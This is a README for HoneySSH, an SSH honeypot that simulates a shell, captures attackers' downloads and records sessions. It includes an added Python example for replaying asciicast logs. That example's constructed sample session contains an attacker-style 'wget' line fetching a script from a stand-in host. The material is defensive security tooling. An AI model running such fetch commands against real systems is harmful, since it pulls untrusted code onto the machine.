
josephlewis42/honeyssh


🍯 HoneySSH

HoneySSH is a medium interaction honeypot that provides attackers a fully simulated Linux shell to play in.

All commands are simulated and run in a per-session sandbox that's destroyed on disconnect.

Features include:

  • A realistic interactive shell.
  • 50+ built-in POSIX commands.
  • Payloads are captured with the fake scp, wget and curl commands for later analysis.
  • Asciicast compatible session keystroke recording and playback.
  • In-memory interactive file system.
  • Reporting capabilities.
  • Machine-readable JSON event log.

Documentation

Most commands have help if you supply the --help flag.

Running the honeypot

# Create a new configuration directory and enter it
mkdir honeypot && cd honeypot

# Initialize the configuration
honeyssh init

# Edit the configuration file config.yaml
nano config.yaml

# (Optional) Generate a new public key from a cryptographically secure RNG

# (Optional) Generate a custom file system image from a container
docker pull ubuntu:latest
docker save ubuntu:latest > tmp-image.tar
honeyssh img2fs tmp-image.tar root_fs.tar.gz

# Test your configuration using the playground functionality
honeyssh playground

# Start the honeypot
honeyssh serve

Configuration

The current directory is used for configuration by default, but can be overridden by the --config flag.

The configuration directory has the following items:

  • app.log: SSH server event log of newline-delimited JSON events, with the schema described by core/logger/log.proto.
  • config.yaml: honeypot configuration; see the file's contents for a description of each item.
  • downloads: files downloaded or uploaded by attackers to the honeypot, along with metadata files describing the invocation that caused each file to be placed here.
  • private_key: private key the SSH server uses.
  • root_fs.tar.gz: the root file system, by default this is adapted from gcr.io/distroless.
  • session_logs: interactive session log recordings.

Replaying the logs

Logs are found in the session_logs directory and are recorded in either User Mode Linux (.log extension) or Asciicast (.cast extension) format.

# Print full output of recorded log to a terminal:
honeyssh logs cat path/to/some.log

# Replay the log in "real time" with a maximum pause of 30 seconds:
honeyssh logs play -i 30s path/to/some.log

# Convert a log to asciicast (asciinema) format.
honeyssh logs asciicast path/to/some.log > out.cast

# Convert an old Kippo log to asciicast (asciinema) format.
honeyssh logs asciicast --fix-kippo path/to/some.log > out.cast
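The -i flag above caps how long a replay pauses between recorded events. As an added example that is not part of honeyssh, the following Python reads an asciicast v2 recording (the format the .cast files use) and applies the same kind of idle cap; the recording below is constructed, and the cap logic mirrors asciinema's idle-time limit rather than honeyssh's own implementation.

```python
import json

# Constructed asciicast v2 recording: a JSON header line followed by
# [elapsed_seconds, event_type, data] lines. Times are absolute offsets
# from session start, as in the real format; "o" is output, "i" is input.
SAMPLE_CAST = "\n".join([
    json.dumps({"version": 2, "width": 80, "height": 24, "timestamp": 1700000000}),
    json.dumps([0.5, "o", "$ "]),
    json.dumps([1.2, "i", "uname -a\r"]),
    json.dumps([1.3, "o", "Linux honeypot 5.15.0 x86_64 GNU/Linux\r\n$ "]),
    json.dumps([125.0, "i", "wget http://example.invalid/x.sh\r"]),  # ~2 min idle gap
    json.dumps([125.4, "o", "$ "]),
])


def parse_asciicast(text: str) -> tuple[dict, list[tuple[float, str, str]]]:
    """Parse asciicast v2 text into (header, events); rejects other versions."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = json.loads(lines[0])
    if header.get("version") != 2:
        raise ValueError(f"unsupported asciicast version: {header.get('version')!r}")
    events = []
    for ln in lines[1:]:
        t, kind, data = json.loads(ln)
        events.append((float(t), kind, data))
    return header, events


def cap_idle_time(events, max_pause: float):
    """Rewrite timestamps so no gap between consecutive events exceeds max_pause.

    Short pauses and ordering are preserved; long silences (an attacker
    who walked away) are compressed so a replay stays watchable.
    """
    out, prev_orig, prev_new = [], 0.0, 0.0
    for t, kind, data in events:
        gap = min(t - prev_orig, max_pause)
        new_t = prev_new + gap
        out.append((new_t, kind, data))
        prev_orig, prev_new = t, new_t
    return out


def session_inputs(events) -> str:
    """Concatenate the attacker's typed input ("i" events) for quick triage."""
    return "".join(data for _, kind, data in events if kind == "i")
```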

Generating interaction reports

honeyssh supports generating basic reports from the application log file (app.log). Run them using honeyssh events REPORT_NAME, where the report name is one of the following:

  • summary: Show a summary of events.
  • bugs: Show events that may have been caused by bugs in the honeypot.
  • interactions: Show a summary of interactive sessions.

All reports allow the following flags:

  • --since duration: Display events newer than a relative duration, e.g. 24h, 45m, 60s.
  • --since-time: Display events after a specific date (RFC3339).

Is it safe?

Maybe. As a medium interaction honeypot, it's more dangerous than a firewall that denies all connections, but far safer than giving attackers access to a real machine or container that you hope you've plugged all the holes in.

Consider running honeyssh in gVisor just in case.

Contributions

See CONTRIBUTING.md.

License

honeyssh is licensed under the Apache 2 license, see LICENSE for the full text.

Additional licenses can be found in the third_party/ and vendor/ directories.

Credits

  • Inspired by the now defunct Kippo project.
